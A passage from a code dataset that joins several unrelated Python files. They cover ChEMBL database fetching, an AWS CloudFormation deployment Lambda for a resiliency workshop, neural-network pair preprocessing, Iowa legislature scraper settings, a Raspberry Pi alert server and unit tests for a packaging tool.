return cur.fetchall()
def fetch_approved_drugs(self):
"""Fetch approved drugs with phase >=3 as dataframe
Args:
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL approved drugs...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
di.molregno,
cs.canonical_smiles,
di.max_phase_for_ind
FROM
drug_indication AS di
LEFT JOIN compound_structures AS cs ON di.molregno = cs.molregno
WHERE
di.max_phase_for_ind >= 3
AND cs.canonical_smiles IS NOT NULL;"""
cur.execute(select_stmt)
return cur.fetchall()
def fetch_random_samples(self, num_samples, max_len):
"""Fetch random samples from ChEMBL as dataframe
Args:
num_samples (int): number of samples to select
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL random samples...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
cs.molregno,
cs.canonical_smiles,
LENGTH(cs.canonical_smiles) as len
FROM
compound_structures AS cs
WHERE
cs.canonical_smiles IS NOT NULL
AND
                            len <= """ + f'{max_len}' + """
ORDER BY RANDOM()
LIMIT """ + f'{num_samples};'
cur.execute(select_stmt)
return cur.fetchall()
def fetch_molecule_cnt(self):
logger.debug('Finding number of molecules...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT count(*)
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
'''
cur.execute(select_stmt)
return cur.fetchone()[0]
def _meta_df(self, **transformation_kwargs):
transformation = self.fp_type(**transformation_kwargs)
prop_meta = {'id': pandas.Series([], dtype='int64')}
        prop_meta.update(dict(zip(IMP_PROPS + ADDITIONAL_FIELD,
                                  IMP_PROPS_TYPE + ADDITIONAL_FIELD_TYPE)))
prop_meta.update({i: pandas.Series([], dtype='float32') for i in range(len(transformation))})
return pandas.DataFrame(prop_meta)
def _fetch_mol_embedding(self,
start=0,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.info('Fetching %d records starting %d...' % (batch_size, start))
imp_cols = ['cp.' + col for col in IMP_PROPS]
if molregnos is None:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
LIMIT %d, %d
''' % (', '.join(imp_cols), start, batch_size)
else:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
LIMIT %d, %d
''' % (', '.join(imp_cols), " ,".join(list(map(str, molregnos))), start, batch_size)
df = pandas.read_sql(select_stmt,
sqlite3.connect(self.chembl_db, uri=True))
# Smiles -> Smiles transformation and filtering
# TODO: Discuss internally to find use or refactor this code to remove
# model specific filtering
df['transformed_smiles'] = df['canonical_smiles']
# if smiles_transforms is not None:
# if len(smiles_transforms) > 0:
# for xf in smiles_transforms:
# df['transformed_smiles'] = df['transformed_smiles'].map(xf.transform)
# df.dropna(subset=['transformed_smiles'], axis=0, inplace=True)
# Conversion to fingerprints or embeddings
# transformed_smiles = df['transformed_smiles']
transformation = self.fp_type(**transformation_kwargs)
cache_data = transformation.transform(df)
return_df = pandas.DataFrame(cache_data)
return_df = pandas.DataFrame(
return_df,
columns=pandas.RangeIndex(start=0,
stop=len(transformation))).astype('float32')
return_df = df.merge(return_df, left_index=True, right_index=True)
return_df.rename(columns={'molregno': 'id'}, inplace=True)
return return_df
def fetch_mol_embedding(self,
num_recs=None,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structures for the first `num_recs`
records as a dask dataframe built from delayed batches.
"""
logger.debug('Fetching properties for all molecules...')
if num_recs is None or num_recs < 0:
num_recs = self.fetch_molecule_cnt()
logger.info('num_recs %d', num_recs)
logger.info('batch_size %d', batch_size)
meta_df = self._meta_df(**transformation_kwargs)
dls = []
for start in range(0, num_recs, batch_size):
bsize = min(num_recs - start, batch_size)
dl_data = delayed(self._fetch_mol_embedding)(start=start,
batch_size=bsize,
molregnos=molregnos,
**transformation_kwargs)
dls.append(dl_data)
return dataframe.from_delayed(dls, meta=meta_df)
def save_fingerprints(self, hdf_path='data/filter_*.h5', num_recs=None, batch_size=5000):
"""
Generates fingerprints for all ChEMBL ID's in the database
"""
logger.debug('Fetching molecules from database for fingerprints...')
mol_df = self.fetch_mol_embedding(num_recs=num_recs, batch_size=batch_size)
mol_df.to_hdf(hdf_path, 'fingerprints')
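# Hedged usage sketch (not part of the source): it assumes the methods above live
# on a class named ChemblData whose constructor takes the fingerprint transformation
# class as fp_type and sets self.chembl_db; both names are hypothetical here.
#
#     chem_data = ChemblData(fp_type=MorganFingerprint)
#     # Writes properties plus fingerprint columns for the first 10000 molecules to HDF5.
#     chem_data.save_fingerprints('data/filter_00.h5', num_recs=10000, batch_size=5000)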
hexsha: 7b15f666dd8b6c5e2030f1efa5c2aa16458ac78c | size: 14567 | ext: py | lang: Python
path: workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
repo: sykang808/aws-well-architected-labs-kor @ da021a9f7501088f871b08560673deac4488eef4 | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null
#
# MIT No Attribution
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
from botocore.exceptions import ClientError
import os
import sys
import logging
import traceback
import boto3
import json
LOG_LEVELS = {'CRITICAL': 50, 'ERROR': 40, 'WARNING': 30, 'INFO': 20, 'DEBUG': 10}
stackname = 'WebServersForResiliencyTesting'
AWS_REGION = 'us-east-2'
ARCH_TO_AMI_NAME_PATTERN = {
# Architecture: (pattern, owner)
"PV64": ("amzn2-ami-pv*.x86_64-ebs", "amazon"),
"HVM64": ("amzn2-ami-hvm-*-x86_64-gp2", "amazon"),
"HVMG2": ("amzn2-ami-graphics-hvm-*x86_64-ebs*", "679593333241")
}
def init_logging():
# Set up logging because debugging with print can get ugly.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
return logger
def setup_local_logging(logger, log_level='INFO'):
# Set the Logger so if running locally, it will print out to the main screen.
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def set_log_level(logger, log_level='INFO'):
# Apply the requested log level, falling back to INFO.
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def process_global_vars():
logger.info("Processing variables from environment.")
try:
global stackname
stackname = 'WebServersForResiliencyTesting'
except SystemExit:
sys.exit(1)
except Exception:
logger.error("Unexpected error!\n Stack Trace:", traceback.format_exc())
def find_latest_ami_name(region, arch):
assert region, "Region is not defined"
assert arch, "Architecture is not defined"
assert arch in ARCH_TO_AMI_NAME_PATTERN, \
"Architecture must be one of {}".format(
ARCH_TO_AMI_NAME_PATTERN.keys())
pattern, owner = ARCH_TO_AMI_NAME_PATTERN[arch]
ec2 = boto3.client("ec2", region_name=region)
images = ec2.describe_images(
Filters=[dict(
Name="name",
Values=[pattern]
)],
Owners=[owner]
).get("Images", [])
assert images, "No images were found"
sorted_images = sorted(
images,
key=lambda image: image["CreationDate"],
reverse=True
)
latest_image = sorted_images[0]
return latest_image["ImageId"]
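# Usage note (example values assumed, not from the source):
#     find_latest_ami_name("us-east-2", "HVM64")  # -> something like "ami-0abc..."
# describe_images returns images in no guaranteed order, so the CreationDate sort
# above is what actually makes the returned image the latest one.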
def find_in_outputs(outputs, key_to_find):
output_string = None
for output in outputs:
if (output['OutputKey'] == key_to_find):
output_string = output['OutputValue']
break
return output_string
def get_password_from_ssm(parameter_name, region):
client = boto3.client('ssm', region_name=region)
logger.debug("Getting pwd from SSM parameter store.")
value = client.get_parameter(
Name=parameter_name,
WithDecryption=True
)
return value['Parameter']['Value']
def deploy_web_servers(event):
logger.debug("Running function deploy_web_servers")
try:
region = event['region_name']
cfn_region = event['cfn_region']
bucket = event['cfn_bucket']
key_prefix = event['folder']
except Exception:
region = os.environ.get('AWS_REGION', AWS_REGION)
cfn_region = os.environ.get('AWS_REGION', AWS_REGION)
bucket = "arc327-well-architected-for-reliability",
key_prefix = "/"
# Create CloudFormation client
client = boto3.client('cloudformation', region)
# Get the S3 bucket the boot script is in, and the object to retrieve and the image to display
boot_bucket = event['boot_bucket']
boot_prefix = event['boot_prefix']
if 'boot_object' in event:
boot_object = event['boot_object']
else:
boot_object = None
websiteimage = event['websiteimage']
# Get the outputs of the VPC stack
vpc_stack = event['vpc']['stackname']
try:
stack_response = client.describe_stacks(StackName=vpc_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
vpc_outputs = stack_list[0]['Outputs']
try:
workshop_name = event['workshop']
except Exception:
logger.debug("Unexpected error!\n Stack Trace:", traceback.format_exc())
workshop_name = 'UnknownWorkshop'
# Create the list of subnets to pass
igw_subnets = find_in_outputs(vpc_outputs, 'IGWSubnets')
private_subnets = find_in_outputs(vpc_outputs, 'PrivateSubnets')
# Get the VPC
vpcid = find_in_outputs(vpc_outputs, 'VPC')
# Get the list of security groups to pass
elb_sg = find_in_outputs(vpc_outputs, 'WebELBSecurityGroup')
web_sg = find_in_outputs(vpc_outputs, 'WebSecurityGroup')
bastion_sg = find_in_outputs(vpc_outputs, 'BastionSecurityGroup')
webserver_sg_list = web_sg + ',' + bastion_sg
# Run in zones a, b, and c
azs = region + "a," + region + "b," + region + "c"
# Get the latest AMI
latest_ami = find_latest_ami_name(region, "HVM64")
# Get the outputs of the RDS stack
rds_stack = event['rds']['stackname']
try:
stack_response = client.describe_stacks(StackName=rds_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
try:
workshop_name = event['workshop']
except Exception:
workshop_name = 'UnknownWorkshop'
rds_outputs = stack_list[0]['Outputs']
# Get the hostname of the RDS host
rds_host = find_in_outputs(rds_outputs, 'DBAddress')
rds_password = get_password_from_ssm(workshop_name, region)
# Prepare the stack parameters
webserver_parameters = []
webserver_parameters.append({'ParameterKey': 'VPCID', 'ParameterValue': vpcid, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSecurityGroups', 'ParameterValue': webserver_sg_list, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSG', 'ParameterValue': elb_sg, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSubnets', 'ParameterValue': igw_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSubnets', 'ParameterValue': private_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerInstanceType', 'ParameterValue': 't2.micro', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerAMI', 'ParameterValue': latest_ami, 'UsePreviousValue': False})
webserver_parameters.append({'ParameterKey': 'AvailabilityZones', 'ParameterValue': azs, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucketRegion', 'ParameterValue': cfn_region, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucket', 'ParameterValue': boot_bucket, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootPrefix', 'ParameterValue': boot_prefix, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebSiteImage', 'ParameterValue': websiteimage, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSHostName', 'ParameterValue': rds_host, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSUser', 'ParameterValue': 'admin', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSPassword', 'ParameterValue': rds_password, 'UsePreviousValue': False})
# If Boot Object is supplied then use it, otherwise CloudFormation template will use Parameter default
if boot_object is not None:
webserver_parameters.append({'ParameterKey': 'BootObject', 'ParameterValue': boot_object, 'UsePreviousValue': True})
stack_tags = []
stack_tags.append({'Key': 'Workshop', 'Value': 'AWSWellArchitectedReliability' + workshop_name})
capabilities = []
capabilities.append('CAPABILITY_NAMED_IAM')
web_template_s3_url = "https://s3." + cfn_region + ".amazonaws.com/" + bucket + "/" + key_prefix + "web_server_autoscaling.json"
client.create_stack(
StackName=stackname,
TemplateURL=web_template_s3_url,
Parameters=webserver_parameters,
DisableRollback=False,
TimeoutInMinutes=10,
Capabilities=capabilities,
Tags=stack_tags
)
return_dict = {'stackname': stackname}
return return_dict
def check_stack(region, stack_name):
# Create CloudFormation client
logger.debug("Running function check_stack in region " + region)
logger.debug("Running function check_stack on stack " + stack_name)
client = boto3.client('cloudformation', region)
# See if you can retrieve the stack
try:
stack_response = client.describe_stacks(StackName=stack_name)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("No Stack named " + stack_name)
return False
logger.debug("Found stack named " + stack_name)
logger.debug("Status: " + stack_list[0]['StackStatus'])
return True
except ClientError as e:
# If the exception is that it doesn't exist, then check the client error before returning a value
if (e.response['Error']['Code'] == 'ValidationError'):
return False
else:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
logger.debug("Client error:" + str(e.response))
return True
except Exception:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
print("Stack Trace:", traceback.format_exc())
return True
def status_complete(status):
return status == 'UPDATE_COMPLETE' or status == 'CREATE_COMPLETE' or status == 'UPDATE_ROLLBACK_COMPLETE'
def lambda_handler(event, context):
try:
global logger
logger = init_logging()
logger = set_log_level(logger, os.environ.get('log_level', event['log_level']))
logger.debug("Running function lambda_handler")
logger.info('event:')
logger.info(json.dumps(event))
if (context != 0):
logger.info('context.log_stream_name:' + context.log_stream_name)
logger.info('context.log_group_name:' + context.log_group_name)
logger.info('context.aws_request_id:' + context.aws_request_id)
else:
logger.info("No Context Object!")
process_global_vars()
# Check to see if the previous stack was actually created
vpc_stack_status = event['vpc']['status']
if (status_complete(vpc_stack_status)):
rds_stack_status = event['rds']['status']
if (status_complete(rds_stack_status)):
if not check_stack(event['region_name'], stackname):
logger.debug("Stack " + stackname + " doesn't exist; creating")
return deploy_web_servers(event)
else:
logger.debug("Stack " + stackname + " exists")
return_dict = {'stackname': stackname}
return return_dict
else:
logger.debug("RDS Stack was not completely created: status = " + rds_stack_status)
sys.exit(1)
else:
logger.debug("VPC Stack was not completely created: status = " + vpc_stack_status)
sys.exit(1)
except SystemExit:
logger.error("Exiting")
sys.exit(1)
except ValueError:
exit(1)
except Exception:
    print("Unexpected error!\n Stack Trace:", traceback.format_exc())
    sys.exit(1)
if __name__ == "__main__":
logger = init_logging()
event = {
'vpc': {
'stackname': 'ResiliencyVPC',
'status': 'CREATE_COMPLETE'
},
'rds': {
'stackname': 'MySQLforResiliencyTesting',
'status': 'CREATE_COMPLETE'
},
'log_level': 'DEBUG',
'region_name': 'ap-northeast-2',
'cfn_region': 'us-east-2',
'cfn_bucket': 'aws-well-architected-labs-ohio',
'folder': 'Reliability/',
'boot_bucket': 'aws-well-architected-labs-ohio',
'boot_prefix': 'Reliability/',
'boot_object': 'bootstrapARC327.sh',
'websiteimage': 'https://s3.us-east-2.amazonaws.com/arc327-well-architected-for-reliability/Cirque_of_the_Towers.jpg',
'workshop': 'LondonSummit'
}
os.environ['log_level'] = os.environ.get('log_level', event['log_level'])
logger = setup_local_logging(logger, os.environ['log_level'])
# Add default level of debug for local execution
lambda_handler(event, 0)
hexsha: 7b17163e98fca69e6d9d2a2ecd44f5b5e78cfd5c | size: 6095 | ext: py | lang: Python
path: Coursework 2/nn_preprocess.py
repo: martinferianc/Pattern-Recognition-EIE4 @ 412d437582b236dadd81c0621935f6b3bd5dbad5 | licenses: ["MIT"]
stars: 1 (2019-08-20T11:17:56.000Z) | issues: null | forks: null
import numpy as np
# For file manipulation and locating
import os
# For the progress bar
from tqdm import tqdm
# To create a deep copy of the data
import copy
# To load the pre-processed and split data
from pre_process import load_data as ld
# For normalization of the samples
from sklearn.preprocessing import normalize
# We define some constant that we reuse
PROCESSED_DIR = "data/processed/"
def save_data(data, file_path, name):
"""
Saves the data
given the name and
the file path
Parameters
----------
data: numpy matrix
Data matrix with features
file_path: str
File path where the file should be saved
name: str
Specific name of the given file
"""
np.save(file_path + "{}.npy".format(name),data)
def preprocess(X, Y, size=100000, lower_bound=0, upper_bound=7368, samples=10, same_class=0.4, different=0.5, penalty=10, same_class_penalty=1):
"""
Preprocesses the dataset into pairs.
It creates two lists X, Y:
it repeatedly draws a random anchor sample from the input list,
and each anchor is then repeated `samples` times in total.
For each repeated anchor it selects a portion of
images corresponding to different labels,
a portion of images corresponding to the same class, and
fills the remaining portion with identities;
based on class membership, a penalty is applied to each pair or not.
Parameters
----------
X: numpy array of features
Numpy array of features from which the pairs are created
Y: numpy array
Numpy array of corresponding labels
Returns
-------
X_selected: numpy array
Numpy array of the first input in the pairs
Y_selected: numpy array
Numpy array of the second input in the pairs
values: numpy array
Artificially determined distances
"""
X = normalize(X, axis=1)
N,F = X.shape
X_selected = []
Y_selected = []
values = []
C = int(samples*same_class)
D = int(samples*different)
selected_i = []
for i in tqdm(range(int(size/samples))):
# Randomly select a sample, but do not repeat it with respect to previous samples
random_i = np.random.randint(lower_bound,upper_bound)
while random_i in selected_i:
random_i = np.random.randint(lower_bound,upper_bound)
selected_i.append(random_i)
C_counter = 0
D_counter = 0
offset = 0
# Add samples which correspond to different label than the original image
selected_j = []
while D_counter<D:
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] != Y[random_j]:
D_counter+=1
offset+=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(penalty)
selected_j.append(random_j)
# Add samples which correspond to the same class
selected_j = []
while C_counter<C:
low = 0   # note: low and high are computed here but never used below
high = N
if random_i-10>lower_bound:
low = random_i-10
if random_i+10<upper_bound:
high = random_i+10
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] == Y[random_j] and random_i!=random_j:
C_counter+=1
offset +=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(same_class_penalty)
selected_j.append(random_j)
# Fill in the rest with identities
while offset < samples:
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_i]))
offset+=1
values.append(0)
indices = np.random.choice(size, size=size, replace=False)
X_selected = np.array(X_selected)
Y_selected = np.array(Y_selected)
values = np.array(values)
return [X_selected[indices], Y_selected[indices], values[indices]]
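# Worked example (hypothetical call, counts derived from the defaults above):
# with samples=10, same_class=0.4 and different=0.5, each anchor contributes
# 5 different-class pairs (value=penalty), 4 same-class pairs
# (value=same_class_penalty), and 1 identity pair (value=0):
#
#     X_sel, Y_sel, vals = preprocess(X, Y, size=1000, upper_bound=len(X))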
def load_data(retrain=False):
"""
Load the cached data or call preprocess()
to generate new data
Parameters
----------
retrain: bool
    If True, regenerate the pair data and cache it; otherwise load the cached files.
Returns
-------
data: list
    [X_train, Y_train, values_train, X_validation, Y_validation, values_validation]
"""
all_data = ld(False)
training_data = all_data[0]
Y = training_data[1]
X = training_data[0]
if retrain is True:
print("Generating new data...")
X_train, Y_train, values_train = preprocess(X,Y, 40000, 0, 6379,samples = 10, same_class=0.4, different = 0.5, penalty = 1,same_class_penalty=0)
X_validation, Y_validation, values_validation = preprocess(X,Y, 7500, 6380,samples = 10, same_class=0.2, different = 0.7, penalty = 1, same_class_penalty=0)
save_data(X_train,PROCESSED_DIR,"training_nn_X")
save_data(Y_train,PROCESSED_DIR,"training_nn_Y")
save_data(values_train,PROCESSED_DIR,"training_nn_values")
save_data(X_validation,PROCESSED_DIR,"validation_nn_X")
save_data(Y_validation,PROCESSED_DIR,"validation_nn_Y")
save_data(values_validation,PROCESSED_DIR,"validation_nn_values")
return [X_train, Y_train, values_train, X_validation, Y_validation, values_validation]
else:
print("Loading data...")
data = []
data.append(np.load(PROCESSED_DIR + "training_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_values.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_values.npy"))
return data
if __name__ == '__main__':
load_data(retrain=True)
hexsha: 7b180f7965af3a7127ae86b77bf7384badafe436 | size: 776 | ext: py | lang: Python
path: src/main.py
repo: M10han/image-scores @ 509e2e9f9d3a484631a97a2e025849c266f71c43 | licenses: ["MIT"]
stars: null | issues: 1 (2021-06-08T21:41:19.000Z) | forks: null
import pandas as pd
import time
from image_matcher import read_image, bjorn_score
def main(data_location='../data/', data_file='input.csv'):
df = pd.read_csv(data_location + data_file)
score_list, runtime_list = [], []
for idx, row in df.iterrows():
image1_file, image2_file = data_location + \
row.image1, data_location + row.image2
image1 = read_image(image1_file)
image2 = read_image(image2_file)
start = time.time()
score = bjorn_score(image1, image2)
end = time.time()
score_list.append(score)
runtime_list.append(f"{end-start:9f}")
df['similar'] = score_list
df['elapsed'] = runtime_list
df.to_csv('output.csv', index=False)
if __name__ == "__main__":
main()
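# Layout assumed for '../data/input.csv' (the column names image1/image2 are what
# main() reads; the file names below are placeholders):
#
#     image1,image2
#     cat_a.png,cat_b.png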
hexsha: 7b1bfc88d4da28ede06e1a7e0dc3ba09c6ec9cb9 | size: 3081 | ext: py | lang: Python
path: openstates/openstates-master/openstates/ia/__init__.py
repo: Jgorsick/Advocacy_Angular @ 8906af3ba729b2303880f319d52bce0d6595764c | licenses: ["CC-BY-4.0"]
stars: null | issues: null | forks: null
import re
import datetime
import lxml.html
import requests
from billy.utils.fulltext import text_after_line_numbers
from .bills import IABillScraper
from .legislators import IALegislatorScraper
from .events import IAEventScraper
from .votes import IAVoteScraper
# Silencing unverified HTTPS request warnings.
requests.packages.urllib3.disable_warnings()
settings = dict(SCRAPELIB_TIMEOUT=240)
metadata = dict(
name = 'Iowa',
abbreviation = 'ia',
capitol_timezone = 'America/Chicago',
legislature_name = 'Iowa General Assembly',
legislature_url = 'https://www.legis.iowa.gov/',
chambers = {
'upper': {'name': 'Senate', 'title': 'Senator'},
'lower': {'name': 'House', 'title': 'Representative'},
},
terms = [
{
'name': '2011-2012',
'start_year': 2011,
'end_year': 2012,
'sessions': ['2011-2012'],
},
{
'name': '2013-2014',
'start_year': 2013,
'end_year': 2014,
'sessions': ['2013-2014'],
},
{
'name': '2015-2016',
'start_year': 2015,
'end_year': 2016,
'sessions': ['2015-2016'],
},
],
session_details = {
'2011-2012': {
'display_name': '2011-2012 Regular Session',
'_scraped_name': 'General Assembly: 84',
'number': '84',
'start_date': datetime.date(2011, 1, 10),
'end_date': datetime.date(2013, 1, 13),
},
'2013-2014': {
'display_name': '2013-2014 Regular Session',
'_scraped_name': 'General Assembly: 85',
'number': '85',
},
'2015-2016': {
'display_name': '2015-2016 Regular Session',
'_scraped_name': 'General Assembly: 86',
'number': '86',
},
},
feature_flags = ['events', 'influenceexplorer'],
_ignored_scraped_sessions = [
'Legislative Assembly: 86',
'General Assembly: 83',
'General Assembly: 82',
'General Assembly: 81',
'General Assembly: 80',
'General Assembly: 79',
'General Assembly: 79',
'General Assembly: 78',
'General Assembly: 78',
'General Assembly: 77',
'General Assembly: 77',
'General Assembly: 76',
]
)
def session_list():
def url_xpath(url, path):
doc = lxml.html.fromstring(requests.get(url, verify=False).text)
return doc.xpath(path)
sessions = url_xpath(
'https://www.legis.iowa.gov/legislation/findLegislation',
"//section[@class='grid_6']//li/a/text()[normalize-space()]"
)
sessions = [x[0] for x in filter(lambda x: x != [], [
re.findall(r'^.*Assembly: [0-9]+', session)
for session in sessions
])]
return sessions
def extract_text(doc, data):
doc = lxml.html.fromstring(data)
text = doc.xpath('//pre')[0].text_content()
# strip two sets of line numbers
return text_after_line_numbers(text_after_line_numbers(text))
hexsha: 7b204556097cfdfd3ff88e8d7bc8bf1337b3e12c | size: 660 | ext: py | lang: Python
path: server/main.py
repo: DarthBenro008/gh-release-paniker @ 757845b1eebef9d2219c88706fd4277f4261391f | licenses: ["MIT"]
stars: 5 (2021-12-08T06:37:33.000Z to 2021-12-20T17:17:18.000Z) | issues: null | forks: null
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
LED = 21
BUZZER = 23
GPIO.setup(LED, GPIO.OUT)
# The buzzer pin must also be configured as an output before GPIO.output can drive it.
GPIO.setup(BUZZER, GPIO.OUT)
def panikMode():
print("Entering PanikMode")
GPIO.output(LED,GPIO.HIGH)
GPIO.output(BUZZER,GPIO.HIGH)
def stopPanikMode():
print("Exiting PanikMode")
GPIO.output(LED,GPIO.LOW)
GPIO.output(BUZZER,GPIO.LOW)
@app.get("/")
def read_root():
return {"ping": "pong"}
@app.get("/stop")
def stopPanik():
stopPanikMode()
return {"paniking": "false"}
@app.get("/panik")
def panik():
panikMode()
return {"paniking": True}
hexsha: 7b20674499d7148c6a6ca240f5128fad607757fd | size: 8656 | ext: py | lang: Python
path: virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
repo: alex-mu/Moringa-blog @ 430ab9c1f43f2f0066369433ac3f60c41a51a01c | licenses: ["MIT"] | stars: null
issues: 7 (2021-03-30T14:10:56.000Z to 2022-03-12T00:43:13.000Z)
forks: 1 (2021-08-19T06:07:23.000Z) via virtual/lib/python3.6/site-packages/bootstrap_py/tests/test_package.py in sarahsindet/pitch @ c7a4256e19c9a250b6d88d085699a34f508eb86b | licenses: ["Unlicense", "MIT"]
# -*- coding: utf-8 -*-
"""bootstrap_py.tests.test_package."""
import unittest
import os
import shutil
import tempfile
from glob import glob
from datetime import datetime
from mock import patch
from bootstrap_py import package
from bootstrap_py.tests.stub import stub_request_metadata
# pylint: disable=too-few-public-methods
class Dummy:
"""Dummy class."""
class PackageDataTests(unittest.TestCase):
"""bootstrap_py.package.PackageData tests."""
def setUp(self):
"""Prepare test data."""
self.params = Dummy()
setattr(self.params, 'foo', 'hoge')
setattr(self.params, 'bar', 'moge')
setattr(self.params, 'baz', 'fuga')
self.default_params = Dummy()
setattr(self.default_params, 'date', '2016-01-29')
setattr(self.default_params, 'version', '1.0.0')
setattr(self.default_params, 'description', 'dummy description.')
self.metadata = stub_request_metadata()
def test_provides_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.params)
# pylint: disable=no-member
self.assertEqual(pkg_data.foo, 'hoge')
self.assertEqual(pkg_data.bar, 'moge')
self.assertEqual(pkg_data.baz, 'fuga')
self.assertEqual(pkg_data.date, datetime.utcnow().strftime('%Y-%m-%d'))
self.assertEqual(pkg_data.version, '0.1.0')
# pylint: disable=fixme
self.assertEqual(pkg_data.description, '##### ToDo: Rewrite me #####')
def test_provides_default_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.default_params)
# pylint: disable=no-member
self.assertEqual(pkg_data.date, '2016-01-29')
self.assertEqual(pkg_data.version, '1.0.0')
self.assertEqual(pkg_data.description, 'dummy description.')
def test_convert_to_dict(self):
"""convert PackageData to dict."""
dict_data = package.PackageData(self.default_params).to_dict()
# pylint: disable=no-member
self.assertEqual(dict_data.get('date'), '2016-01-29')
self.assertEqual(dict_data.get('version'), '1.0.0')
self.assertEqual(dict_data.get('description'), 'dummy description.')
class PackageTreeTests(unittest.TestCase):
"""bootstrap.package.PackageTree tests."""
def setUp(self):
"""Prepare test data."""
self.cwd = os.getcwd()
